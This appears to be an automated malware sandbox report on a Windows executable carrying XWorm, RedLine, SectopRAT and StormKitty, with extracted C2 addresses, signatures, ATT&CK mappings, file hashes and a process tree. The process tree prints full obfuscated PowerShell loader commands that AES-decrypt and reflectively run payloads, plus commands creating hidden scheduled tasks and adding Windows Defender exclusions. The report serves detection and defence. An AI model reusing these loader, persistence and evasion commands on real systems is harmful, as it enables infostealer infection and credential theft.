Overview

overview

10

Static

static

3

1bb56efc0a...27.exe

windows7-x64

9

1bb56efc0a...27.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    93s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-06-2024 01:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe

  • Size

    15.6MB

  • MD5

    ad3893ee2a8e40f2700236672635f5aa

  • SHA1

    80f3c0bc398c473e32eeb1420218be6a5feb291d

  • SHA256

    1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727

  • SHA512

    748db720695d028c034367f0af26d80ced9700dc497a82ce5a4ce578b39fb24c0f869ddbae3b542b15718523fa3cd29c11f78ded0f9f748ac4954256472a4111

  • SSDEEP

    196608:IZu1YQGj4ZSo3jXkpiliRElNhT7kiibJ488hEipzLmCKg4EFJ9UHytjAIgwX4FVE:+u1OjJEIZulNyHytjma0VvjZ6

Score
10/10
redlinesectopratstormkittyxwormcrackeddiscoveryexecutioninfostealerpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

94.156.8.186:7000

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

Extracted

Family

redline

Botnet

cracked

C2

94.156.8.186:37552

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 1 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs. 1 IoCs
  • Detects Windows executables referencing non-Windows User-Agents 3 IoCs
  • Detects executables (downlaoders) containing URLs to raw contents of a paste 2 IoCs
  • Detects executables containing artifacts associated with disabling Widnows Defender 1 IoCs
  • Detects executables embedding registry key / value combination indicative of disabling Windows Defender features 1 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 1 IoCs
  • Detects executables referencing credit card regular expressions 1 IoCs
  • Detects executables using Telegram Chat Bot 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

    execution
  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
    "C:\Users\Admin\AppData\Local\Temp\1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1060
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AdABsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdQBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAdQBpACMAPgA="
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2460
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\xworm.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1824
      • C:\Users\Admin\AppData\Roaming\xworm.bat.exe
        "xworm.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_TxKiz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xworm.bat').Split([Environment]::NewLine);foreach ($_CASH_XMOQm in $_CASH_TxKiz) { if ($_CASH_XMOQm.StartsWith(':: @')) { $_CASH_ssYCl = $_CASH_XMOQm.Substring(4); break; }; };$_CASH_ssYCl = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ssYCl, '_CASH_', '');$_CASH_CfCmx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ssYCl);$_CASH_tsEof = New-Object System.Security.Cryptography.AesManaged;$_CASH_tsEof.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tsEof.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tsEof.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U=');$_CASH_tsEof.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/z4iXtMuBf06DnNNej/bVw==');$_CASH_KWHai = $_CASH_tsEof.CreateDecryptor();$_CASH_CfCmx = $_CASH_KWHai.TransformFinalBlock($_CASH_CfCmx, 0, $_CASH_CfCmx.Length);$_CASH_KWHai.Dispose();$_CASH_tsEof.Dispose();$_CASH_fYpGJ = New-Object System.IO.MemoryStream(, $_CASH_CfCmx);$_CASH_FImSp = New-Object System.IO.MemoryStream;$_CASH_aydNz = New-Object System.IO.Compression.GZipStream($_CASH_fYpGJ, [IO.Compression.CompressionMode]::Decompress);$_CASH_aydNz.CopyTo($_CASH_FImSp);$_CASH_aydNz.Dispose();$_CASH_fYpGJ.Dispose();$_CASH_FImSp.Dispose();$_CASH_CfCmx = $_CASH_FImSp.ToArray();$_CASH_MWQwC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_CfCmx);$_CASH_eABCx = $_CASH_MWQwC.EntryPoint;$_CASH_eABCx.Invoke($null, (, [string[]] ('')))
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:544
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\xworm')
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4796
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_256_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_256.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4932
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_256.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1788
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_256.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:464
            • C:\Users\Admin\AppData\Roaming\startup_str_256.bat.exe
              "startup_str_256.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_TxKiz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_256.bat').Split([Environment]::NewLine);foreach ($_CASH_XMOQm in $_CASH_TxKiz) { if ($_CASH_XMOQm.StartsWith(':: @')) { $_CASH_ssYCl = $_CASH_XMOQm.Substring(4); break; }; };$_CASH_ssYCl = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ssYCl, '_CASH_', '');$_CASH_CfCmx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ssYCl);$_CASH_tsEof = New-Object System.Security.Cryptography.AesManaged;$_CASH_tsEof.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tsEof.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tsEof.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U=');$_CASH_tsEof.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/z4iXtMuBf06DnNNej/bVw==');$_CASH_KWHai = $_CASH_tsEof.CreateDecryptor();$_CASH_CfCmx = $_CASH_KWHai.TransformFinalBlock($_CASH_CfCmx, 0, $_CASH_CfCmx.Length);$_CASH_KWHai.Dispose();$_CASH_tsEof.Dispose();$_CASH_fYpGJ = New-Object System.IO.MemoryStream(, $_CASH_CfCmx);$_CASH_FImSp = New-Object System.IO.MemoryStream;$_CASH_aydNz = New-Object System.IO.Compression.GZipStream($_CASH_fYpGJ, [IO.Compression.CompressionMode]::Decompress);$_CASH_aydNz.CopyTo($_CASH_FImSp);$_CASH_aydNz.Dispose();$_CASH_fYpGJ.Dispose();$_CASH_FImSp.Dispose();$_CASH_CfCmx = $_CASH_FImSp.ToArray();$_CASH_MWQwC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_CfCmx);$_CASH_eABCx = $_CASH_MWQwC.EntryPoint;$_CASH_eABCx.Invoke($null, (, [string[]] ('')))
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1652
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_256')
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:2876
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Roaming\startup_str_256.bat.exe" & del "C:\Users\Admin\AppData\Roaming\startup_str_256.bat.exe"
                7⤵
                  PID:3524
                  • C:\Windows\SysWOW64\choice.exe
                    choice /c y /n /d y /t 1
                    8⤵
                      PID:3180
                    • C:\Windows\SysWOW64\attrib.exe
                      attrib -h -s "C:\Users\Admin\AppData\Roaming\startup_str_256.bat.exe"
                      8⤵
                      • Views/modifies file attributes
                      PID:3800
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\xfixer.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3304
          • C:\Users\Admin\AppData\Roaming\xfixer.bat.exe
            "xfixer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_CnGzR = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xfixer.bat').Split([Environment]::NewLine);foreach ($_CASH_qdZmU in $_CASH_CnGzR) { if ($_CASH_qdZmU.StartsWith(':: @')) { $_CASH_ZoWEj = $_CASH_qdZmU.Substring(4); break; }; };$_CASH_ZoWEj = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZoWEj, '_CASH_', '');$_CASH_fXadG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZoWEj);$_CASH_HMtAt = New-Object System.Security.Cryptography.AesManaged;$_CASH_HMtAt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_HMtAt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_HMtAt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fIynBYcBUpBBez+nt2djmwJqlIyvat7HzgVRpfM2ODQ=');$_CASH_HMtAt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5/SuT9a8EJc5rjsiLxvRg==');$_CASH_tRKDk = $_CASH_HMtAt.CreateDecryptor();$_CASH_fXadG = $_CASH_tRKDk.TransformFinalBlock($_CASH_fXadG, 0, $_CASH_fXadG.Length);$_CASH_tRKDk.Dispose();$_CASH_HMtAt.Dispose();$_CASH_xnUdL = New-Object System.IO.MemoryStream(, $_CASH_fXadG);$_CASH_gkSYz = New-Object System.IO.MemoryStream;$_CASH_UMTAN = New-Object System.IO.Compression.GZipStream($_CASH_xnUdL, [IO.Compression.CompressionMode]::Decompress);$_CASH_UMTAN.CopyTo($_CASH_gkSYz);$_CASH_UMTAN.Dispose();$_CASH_xnUdL.Dispose();$_CASH_gkSYz.Dispose();$_CASH_fXadG = $_CASH_gkSYz.ToArray();$_CASH_lwuuH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_fXadG);$_CASH_pYHCE = $_CASH_lwuuH.EntryPoint;$_CASH_pYHCE.Invoke($null, (, [string[]] ('')))
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1304
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\xfixer')
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4596
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_810_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_810.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:920
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_810.vbs"
              4⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:3844
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_810.bat" "
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:232
                • C:\Users\Admin\AppData\Roaming\startup_str_810.bat.exe
                  "startup_str_810.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_CnGzR = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_810.bat').Split([Environment]::NewLine);foreach ($_CASH_qdZmU in $_CASH_CnGzR) { if ($_CASH_qdZmU.StartsWith(':: @')) { $_CASH_ZoWEj = $_CASH_qdZmU.Substring(4); break; }; };$_CASH_ZoWEj = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZoWEj, '_CASH_', '');$_CASH_fXadG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZoWEj);$_CASH_HMtAt = New-Object System.Security.Cryptography.AesManaged;$_CASH_HMtAt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_HMtAt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_HMtAt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fIynBYcBUpBBez+nt2djmwJqlIyvat7HzgVRpfM2ODQ=');$_CASH_HMtAt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5/SuT9a8EJc5rjsiLxvRg==');$_CASH_tRKDk = $_CASH_HMtAt.CreateDecryptor();$_CASH_fXadG = $_CASH_tRKDk.TransformFinalBlock($_CASH_fXadG, 0, $_CASH_fXadG.Length);$_CASH_tRKDk.Dispose();$_CASH_HMtAt.Dispose();$_CASH_xnUdL = New-Object System.IO.MemoryStream(, $_CASH_fXadG);$_CASH_gkSYz = New-Object System.IO.MemoryStream;$_CASH_UMTAN = New-Object System.IO.Compression.GZipStream($_CASH_xnUdL, [IO.Compression.CompressionMode]::Decompress);$_CASH_UMTAN.CopyTo($_CASH_gkSYz);$_CASH_UMTAN.Dispose();$_CASH_xnUdL.Dispose();$_CASH_gkSYz.Dispose();$_CASH_fXadG = $_CASH_gkSYz.ToArray();$_CASH_lwuuH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_fXadG);$_CASH_pYHCE = $_CASH_lwuuH.EntryPoint;$_CASH_pYHCE.Invoke($null, (, [string[]] ('')))
                  6⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious behavior: AddClipboardFormatListener
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:2712
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_810')
                    7⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:228
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\startup_str_810.bat'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3340
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'startup_str_810.bat.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1948
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1120
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4612
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 3504
                    7⤵
                    • Program crash
                    PID:1988
        • C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe
          "C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe"
          2⤵
          • Executes dropped EXE
          PID:1836
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2712 -ip 2712
        1⤵
          PID:3096

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Initial Access

        Execution

        Command and Scripting Interpreter

        1
        T1059

        PowerShell

        1
        T1059.001

        Persistence

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Privilege Escalation

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Defense Evasion

        Modify Registry

        1
        T1112

        Hide Artifacts

        1
        T1564

        Hidden Files and Directories

        1
        T1564.001

        Credential Access

        Unsecured Credentials

        2
        T1552

        Credentials In Files

        2
        T1552.001

        Discovery

        Query Registry

        2
        T1012

        System Information Discovery

        2
        T1082

        Lateral Movement

        Collection

        Data from Local System

        2
        T1005

        Exfiltration

        Command and Control

        Impact

        Resource Development

        Reconnaissance

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          968cb9309758126772781b83adb8a28f

          SHA1

          8da30e71accf186b2ba11da1797cf67f8f78b47c

          SHA256

          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

          SHA512

          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          75c4145f77ef3a29e5b3367469280498

          SHA1

          a067727aa790e68a853faf535583a0556c9971b3

          SHA256

          c6b41847a68cc3bc665e55ce886ed74caf99386c6d9b1cc1fd6b3afe07e813ce

          SHA512

          9b72df18130b56c8f4c83b81976b666718904fc94fd28ca6484901ef188b2a9bb8d6534793a8fde511f2fb05c9085f675b35c6e6dfcdc4c1899f16f10f1267e2

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          20KB

          MD5

          ecd5a03e096872cb7895a677ba7f8b1a

          SHA1

          51ae21bbc273b45875f5b93558157851180e2d93

          SHA256

          a90deb215b4bf9961cc5f9cd7c1ff9a02e9dbc6ab35d43a39c00f20bc02f7bc5

          SHA512

          d902dcef787eb848f474145d61ddaa6dc233bedd600855347094fc885e1dbee426bff2f9ff6230bbb7e99c75e074b9e371de984cc7b38d004ae3032e7c8010b9

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          21KB

          MD5

          c47059e7fc3cb1098f917aac052b57c5

          SHA1

          c3632831986d64bb3175f9b9b4485d61f7cef5e8

          SHA256

          1a0abed94dc321737d8acdb3c33f647d0d8edc04fa43349689994397a41c9d5e

          SHA512

          fed652583b8fb9e51595c5c5336df3282da497e436e0ae0ae474820497ae4b1f0667e5f1e26bbdeaafc2504cc66ed5083ff84356fa3a404fd3c1d9cb63a02224

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          17KB

          MD5

          2f1743f9c6277ceb85951a7004b057d5

          SHA1

          8a10cb3e53751e94d65f5953e5f226b24c582a96

          SHA256

          a737ab07c95cacb491d0c416de7199d17db78ebfd55a4a4dbb6e091f5ef0c78d

          SHA512

          80dbdae50f90fbc78598645b98d86d457f9b1c1c069eff63ae129677bec4c0801297c9eaf89500141c042890a57efdd0acae4a0d60d7645a59e9b527a04b2485

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          20KB

          MD5

          2c738123c1bc5db7dd2df5bbf7dbea49

          SHA1

          fac5dc9b23b1ec54873f985d88be43406beaa9e7

          SHA256

          a18fddf68434cdda41652fbe533089340f74883252ba35cb8a92d044ea584067

          SHA512

          04a98bcb2d120cde6beccbb65a92e504c78243fe44b6eaeb02c4861a3413f31dce240b4779e600ecda06b5db9f1e3aa91bbdb361a9aa27653edd508a2bb93d35

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          b1798c6339cbbb05ffdfabdd27e2d60a

          SHA1

          67789e14e1b7b4312186e23b95cc9d3303bcced0

          SHA256

          767303ea31446fe4f81ba8745bc0f7c2d36bd957d531e815258bccf6b13c6251

          SHA512

          2a905a028eb00364c3208e904e04bd01902249daa275fd556c9face9d6276e01d412e231eddf08c8469ad0ddec83384153ced194ec2edf7b332e98bf9b3d619f

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          e5123e738a140454877939e152d25873

          SHA1

          9f5a93bb2bac256cd4d898dd5f51963d2b1e7f1f

          SHA256

          d001687ac2d1ebdd16dc8fb06bb9a8c05ec0948525cf9a25cadf75a08c22ed2a

          SHA512

          d8b0fbf1599baff4f1c78fe40230239490daaba639ed994bff704c6a7029c70103ed20f37a58e3980e7c16f792c8047a46b5190073e75f6c041c7ff24a79cb58

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          7a5684d845171efc3f76350dddb89e59

          SHA1

          a82302a9341337825e9f25049ee779b8733f8278

          SHA256

          945cbd7198d5250833df81cd27e7a30d37a2823c701f920b4c170df4293b22a7

          SHA512

          6d11aceda0932b73a1b0c03061827c97604d474929363563fd76beb9a9efd34a9f7cc04119999601f1089065a4a89d943da96283df14b5f0f32870ed1da87c34

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          25KB

          MD5

          c63c30bf8d711cd6834a5b1a0c24404c

          SHA1

          b96ad69bbba63a39398c30f51bc554eefa3b1518

          SHA256

          65a75c448575948b268c8220f1a7d4f028544bb8de8f3613fff3474cd5f74cb3

          SHA512

          f9eb46c55c621d02ad7785175f30babaa38d6aad4c85f0f5fd41a9fa877441941a26995c320b976cb99429496daca6908cea2b56eaa29b60397a11b80d3da66d

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c0wisffo.zke.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\tmpA57F.tmp
          Filesize

          46KB

          MD5

          8f5942354d3809f865f9767eddf51314

          SHA1

          20be11c0d42fc0cef53931ea9152b55082d1a11e

          SHA256

          776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

          SHA512

          fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\tmpA5A4.tmp
          Filesize

          100KB

          MD5

          7e58c37fd1d2f60791d5f890d3635279

          SHA1

          5b7b963802b7f877d83fe5be180091b678b56a02

          SHA256

          df01ff75a8b48de6e0244b43f74b09ab7ebe99167e5da84739761e0d99fb9fc7

          SHA512

          a3ec0c65b2781340862eddd6a9154fb0e243a54e88121f0711c5648971374b6f7a87d8b2a6177b4f1ae0d78fb05cf0ee034d3242920301e2ee9fcd883a21b85e

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\tmpA5D0.tmp
          Filesize

          48KB

          MD5

          349e6eb110e34a08924d92f6b334801d

          SHA1

          bdfb289daff51890cc71697b6322aa4b35ec9169

          SHA256

          c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

          SHA512

          2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\tmpA5D6.tmp
          Filesize

          20KB

          MD5

          49693267e0adbcd119f9f5e02adf3a80

          SHA1

          3ba3d7f89b8ad195ca82c92737e960e1f2b349df

          SHA256

          d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

          SHA512

